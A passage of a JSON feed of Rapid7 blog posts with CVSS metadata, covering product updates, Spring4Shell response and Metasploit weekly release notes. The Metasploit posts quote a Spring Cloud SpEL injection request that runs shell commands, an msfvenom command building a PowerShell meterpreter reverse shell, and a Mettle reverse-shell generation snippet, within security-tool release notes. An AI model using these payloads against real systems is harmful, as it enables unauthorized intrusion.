The code will get blocked and they have to remediate it.\"_ \n \n_\\- Midhun Kumar, Head of Infrastructure and Cloud Operations, _[_Pearl Data Direct_](<https://www.rapid7.com/about/customers/pearl-data-direct/>)\n\nBuilding on the success of our [Jenkins Plugin](<https://extensions.rapid7.com/extension/insightappsec-jenkins-plugin>), [Atlassian Bamboo Plugin](<https://extensions.rapid7.com/extension/insightappsec-bamboo-plugin>), and [Azure DevOps](<https://extensions.rapid7.com/extension/insightappsec-azure-devops-extension>) CI/CD integrations, we recently added native [GitHub Actions](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>) and [GitLab CI/CD](<https://extensions.rapid7.com/extension/insightappsec-scan-gitlab>) integrations into InsightAppSec.\n\n### GitHub\n\n[GitHub Actions](<https://github.com/features/actions>) allows development teams to automate software workflows. With our new [InsightAppSec Scan Action for GitHub](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>), you can easily pull down the repo and add it to your DevOps pipelines. As part of your actions, you can trigger the InsightAppSec scan and have the results passed back into GitHub actions. If you want, you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThis is available for no additional cost in the [GitHub Marketplace](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>).\n\n### GitLab\n\n[GitLab CI/CD](<https://about.gitlab.com/stages-devops-lifecycle/continuous-integration/>) can automatically build, test, deploy, and monitor your applications. With our new InsightAppSec Scan Job, you can add a Docker command in your pipeline to trigger a scan. 
The results are sent back, and you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThe feature is available for no additional cost, and we have resources to help you learn [how to set up the GitLab integration](<https://docs.rapid7.com/insightappsec/gitlab-integration/>).\n\n## Spring4Shell testing and protection\n\n[CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), a zero-day vulnerability announced on April 1st, is no April Fools' Day joke. While it's not as dreadful as [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), it should still be patched, and there are reports of the Spring4Shell flaw being used to install the Mirai Botnet malware.\n\nTo help our customers secure their applications and understand their risk from Spring4Shell, Rapid7 released [new capabilities](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>), including:\n\n * New RCE Attack Module for Spring4Shell (InsightAppSec)\n * New Block Rule for Spring4Shell (tCell)\n * New Detection of CVE-2022-22965 in running applications (tCell)\n\n## Other enhancements\n\nInsightAppSec comes with the ability to create custom dashboards to quickly view and get insights on the risk and status of your program. Relying on feedback from customers, we recently added the ability to create dashboards based on certain apps or groups of apps. This allows you to quickly view risk in the context of what matters.\n\nCustomers often like to manage their applications at scale, and one of the easiest ways to do that is via the tCell API. Significant feature enhancements, including App Firewall event and block rules, OS commands, Local Files, suspicious actors, and more, have all been added or updated. 
Check out our [API documentation](<https://docs.rapid7.com/tcell/api/>).\n\nRapid7's application security portfolio can help you shift left as well as shift right, depending on your needs and the status of your program. You can integrate InsightAppSec DAST into your CI/CD pipelines before deployment to production. And with tCell, you can add web application and API protection for your production environments.\n\nStay tuned for all we have in store in Q2!\n\n_**Additional reading**_\n\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n * _[InsightAppSec GitHub Integration Keeps Risky Code From Reaching Production](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>)_\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[A Dream Team-Up: Integrate InsightAppSec With ServiceNow ITSM](<https://www.rapid7.com/blog/post/2021/12/08/a-dream-team-up-integrate-insightappsec-with-servicenow-itsm/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T14:22:55", "type": "rapid7blog", "title": "Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-15T14:22:55", "id": "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "href": "https://blog.rapid7.com/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. 
We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions prior to 3.1.7 and 3.2.3. 
This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a 
crash when running the `exploit/multi/misc/java_rmi_server` module against a target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as \"Spring4Shell.\" [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). 
This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. 
However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. 
This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. 
For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the 
Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T17:56:13", "description": "\n\nThe Vulnerability Management team kicked off Q2 by [remediating](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) the instances of [Spring4Shell](<https://docs.rapid7.com/insightvm/spring4shell/>) (CVE-2022-22965) and Spring Cloud 
(CVE-2022-22963) vulnerabilities that impacted cybersecurity teams worldwide. We also made several investments in both [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) throughout the second quarter that will help improve and better automate vulnerability management for your organization. Let\u2019s dive in!\n\n## [InsightVM] New dashboard cards based on CVSS v3 Severity \n\nCVSS (Common Vulnerability Scoring System) is an open standard for scoring the severity of vulnerabilities; it\u2019s a key metric that organizations use to prioritize risk in their environments. To empower organizations with tools to do this more effectively, we recently duplicated seven CVSS dashboard cards in InsightVM to include a version that sorts the vulnerabilities based on CVSS v3 scores. The v3 CVSS system made some changes to both quantitative and qualitative scores. For example, [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) had a score of 9.3 (high) in v2 and a 10 (critical) in v3. \n\n**Having both V2 and V3 version dashboards available allows you to prioritize and sort vulnerabilities according to your chosen methodology.** Security is not one-size-fits-all, and the CVSS v2 scoring might provide more accurate vulnerability prioritization for some customers. InsightVM allows customers to choose whether v2 or v3 scoring is a better option for their organizations\u2019 unique needs. \n\nThe seven cards now available for CVSS v3 are:\n\n * Exploitable Vulnerabilities by CVSS Score\n * Exploitable Vulnerability Discovery Date by CVSS Score\n * Exploitable Vulnerability Publish Age by CVSS Score\n * Vulnerability Count By CVSS Score Over Time\n * Vulnerabilities by CVSS Score\n * Vulnerability Discovery Date by CVSS Score\n * Vulnerability Publish Age by CVSS Score\n\n\n## [InsightVM] Asset correlation for Citrix VDI instances\n\nYou asked, and we listened. 
By popular demand, InsightVM can now identify agent-based assets that are Citrix VDI instances and correlate them to the user, enabling more accurate asset/instance tagging.\n\nPreviously, when a user started a non-persistent VDI, it created a new AgentID, which then created a new asset in the console and consumed a user license. The InsightVM team is excited to bring this solution to our customers for this widely persistent problem. \n\nThrough the Improved Agent experience for Citrix VDI instances, when User X logs into their daily virtual desktop, it will automatically correlate to that user\u2019s experience, maintain the asset history, and consume only one license. **The result is a smoother, more streamlined experience for organizations that deploy and scan Citrix VDI.**\n\n## [Nexpose and InsightVM] Scan Assistant made even easier to manage\n\nIn December 2021, we launched Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; this alleviates the credential management headaches VM teams often encounter. The Scan Assistant is also designed to drive improved vulnerability scanning performance in both InsightVM and Nexpose, with faster completion times for both vulnerability and policy scans. \n\nWe recently released Scan Assistant 1.1.0, which automates Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants. This new automation improves security \u2013 digital certificates are more difficult to compromise than credentials \u2013 and simplifies administration for organizations by enabling them to centrally manage features from the Security Console.\n\nCurrently, these enhancements are only available on Windows OS. 
To opt into automated Scan Assistant software updates and/or digital certificate rotation, please visit the Scan Assistant tab in the Scan Template.\n\n\n\n\n\n## [[Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>) and [InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>)] Recurring coverage \n\nRapid7 is committed to providing ongoing monitoring and coverage for a number of software products and services. The Vulnerability Management team continuously evaluates items to add to our recurring coverage list, basing selections on threat and security advisories, overall industry adoption, and customer requests. \n\nWe recently added several notable software products/services to our list of recurring coverage, including:\n\n * **AlmaLinux and Rocky Linux.** These free Linux operating systems have grown in popularity among Rapid7 Vulnerability Management customers seeking a replacement for CentOS. Adding recurring coverage for both AlmaLinux and Rocky Linux enables customers to more safely make the switch and maintain visibility into their vulnerability risk profile.\n * **Oracle E-Business Suite.** ERP systems contain organizations\u2019 \u201ccrown jewels\u201d \u2013 like customer data, financial information, strategic plans, and other proprietary data \u2013 so it\u2019s no surprise that attacks on these systems have [increased ](<https://www.mckinsey.com/business-functions/mckinsey-digital/our-insights/seven-steps-to-help-protect-your-erp-system-against-cyberattacks>)in recent years. Our new recurring coverage for the Oracle E-Business Suite is one of the most complex pieces of recurring coverage added to our list, providing coverage for several different components to ensure ongoing protection for Oracle E-Business Suite customers\u2019 most valuable information.\n * **VMware Horizon. **The VMware Horizon platform enables the delivery of virtual desktops and applications across a number of operating systems. 
VDI is a prime target for bad actors trying to access customer environments, due in part to its multiple entry points; once a hacker gains entry, it\u2019s fairly easy for them to jump into a company\u2019s servers and critical files. By providing recurring coverage for both the VMware server and client, Rapid7 gives customers broad coverage of this particular risk profile. \n\n## [InsightVM] Remediation Projects\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). We\u2019re excited to announce a few updates to this feature:\n\n### Better way to track progress for projects\n\nThe InsightVM team has updated the metric that calculates progress for Remediation Projects. The new metric will advance for each individual asset remediated within a \u201csolution\u201d group. Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress. Security teams can thus have meaningful discussions about progress with assigned remediators or upper management. [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Remediator Export\n\nWe added a new and much requested solution-based CSV export option to Remediation Projects. Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution. This update makes it easy and quick for the Security teams to share relevant data with the Remediation team. It also gives remediators all of the information they need. We call this a win-win for both teams! [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Project search bar for Projects\n\nOur team has added a search bar on the Remediation Projects page. 
This highly requested feature empowers customers to easily locate a project instead of having to scroll down the entire list.\n\n\n\n_**Additional reading:**_\n\n * _[InsightVM Release Update: Let\u2019s Focus on Remediation for Just a Minute](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>)_\n * _[How to Build and Enable a Cyber Target Operating Model](<https://www.rapid7.com/blog/post/2022/07/08/how-to-build-and-enable-a-cyber-target-operating-model/>)_\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-28T14:00:00", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
